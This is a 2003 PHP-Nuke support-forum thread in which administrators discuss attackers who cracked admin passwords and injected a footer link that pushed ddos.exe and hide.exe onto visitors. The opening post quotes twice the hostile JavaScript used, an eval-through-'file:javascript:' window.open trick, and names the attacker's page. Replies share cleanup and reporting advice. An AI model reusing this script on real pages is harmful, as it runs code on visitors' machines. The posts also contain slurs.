Ok there are some little hackin fags out there messin with Nuke sites. One in particular is crackin admin passwords and adding this link to the footer box in the admin preferences section.
This in turn causing a html page to open on the main page of your site and continually flash. Encoded in this html page are a series of scripts Listed below.
function preparecode(code) {
result = '';
lines = code.split(/\r\n/);
for (i=0;i<lines.length;i++) {
line = lines[i];
line = line.replace(/^\s+/,"");
line = line.replace(/\s+$/,"");
line = line.replace(/'/g,"\\'");
line = line.replace(/[\\]/g,"\\\\");
line = line.replace(/[/]/g,"%2f");
if (line != '') {
result += line +'\\r\\n';
}
}
return result;
}
function doit() {
mycode = preparecode(document.all.code.value);
myURL = "file:javascript:eval('" + mycode + "')";
window.open(myURL,"_media")
}
window.open("error.jsp", "_media");
setTimeout("doit()", 50000);
You are then taken to "http://don.niggie.net/bla2.html"
function preparecode(code) {
result = '';
lines = code.split(/\r\n/);
for (i=0;i<lines.length;i++) {
line = lines[i];
line = line.replace(/^\s+/,"");
line = line.replace(/\s+$/,"");
line = line.replace(/'/g,"\\'");
line = line.replace(/[\\]/g,"\\\\");
line = line.replace(/[/]/g,"%2f");
if (line != '') {
result += line +'\\r\\n';
}
}
return result;
}
function doit() {
mycode = preparecode(document.all.code.value);
myURL = "file:javascript:eval('" + mycode + "')";
window.open(myURL,"_media")
}
window.open("error.jsp", "_media");
setTimeout("doit()", 5000);
What these scripts do is upload 2 files one called ddos.exe and the other called hide.exe that auto executes if you do not have a firewall up. These files shut down all access to your email accounts and also prevent you from opening any windows. When you try to open a cascading screen it immediately dissappears so you can't use it. Once they find your password they then add a script like this to your footer box in your admin preferences.
My advice- choose your admin username that is totally different from your Regular Username that makes it harder for them to find, since the cracker probably searches matches that they find to the registered username that shows up in your members list.
Number one tho immediately change all your passwords for all your users who have admin access, because if you havent done it yet. He can still get in your site.
THESE SITES ARE STILL UP AND RUNNING SO BEWARE... IT HAS BEEN REPORTED TO THE SERVICE PROVIDER THAT THIS INDIVIDUAL IS USING, BUT NOTHING HAS BEEN DONE.
where do i get the patch guys for this security hack my pc will be safe wont it i went to that site at "www.don.niggie.net/bla.html" but i have a firewall and nothing happened i had no popups or nothing and i searched for hide.exe and ddos.exe it found nothing?
cheers
the person who made that hack wants burning at the steak.
_________________
Backup files BEFORE altering
Use PHPNuke 7.6 with patches!!
No private messages please, POST in forums.
DaveTomneyUK Lieutenant
Joined: Sep 03, 2003
Posts: 162
Location: UK, England
Posted:
Thu Oct 16, 2003 9:27 am
cheers
Minne Lieutenant
Joined: Jul 15, 2003
Posts: 150
Location: Small Sports
Posted:
Sun Oct 19, 2003 8:09 pm
but when u choose another user name for admin its so easy to find b/c when u post news it says posted by: username
so its not that tricky
_________________
arghhhh Nuke Soldier
Joined: Oct 24, 2003
Posts: 13
Posted:
Fri Oct 24, 2003 9:59 am
Idiots!
They did it to our website, the same don.niggie thing.
Also created an admin account called BOO
I wonder what the point of them doing this is.
aleco Nuke Cadet
Joined: May 29, 2003
Posts: 3
Posted:
Fri Oct 24, 2003 12:11 pm
We got hacked too, but fixed it before anything much was done (only 2 people noticed something was wrong)
Anyway, upon inspection of the server logs, this is his/her ip address:
julie.nfrance.com
I can provide further details of activity if required - it looks like this person started going through hundreds of our files, stopped for a short period (a week or two) and then came back again just before the final hack. (presumably this was the time required to crack the passwords stored in the database?)
Also, should i send an email to anyone about this? eg our hosts, the hackers hosts, and Microsoft? I say Microsoft as it only appeared to affect IE, not Opera. Opera just opened a new window opened, leading to error.jsp. However I'm behind a firewall so didn't actually suffer from anything, so perhaps it was just me.
Anyway, any further info/help let me know!
Zhen-Xjell Nuke Cops Founder
Joined: Nov 14, 2002
Posts: 5939
Posted:
Sat Oct 25, 2003 12:17 pm
Yes anything you can get from your logs to submit to their abuse agencies you should do immediately.
_________________ Paul Laudanski, Microsoft MVP Windows-Security
CastleCops: [de] [en] [wiki]
saupz Nuke Cadet
Joined: Oct 27, 2003
Posts: 1
Posted:
Mon Oct 27, 2003 1:20 am
sometimes hacker is good enough looking at our weakness.. but sometime they are good trying to help us in loking for the bug and hole
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
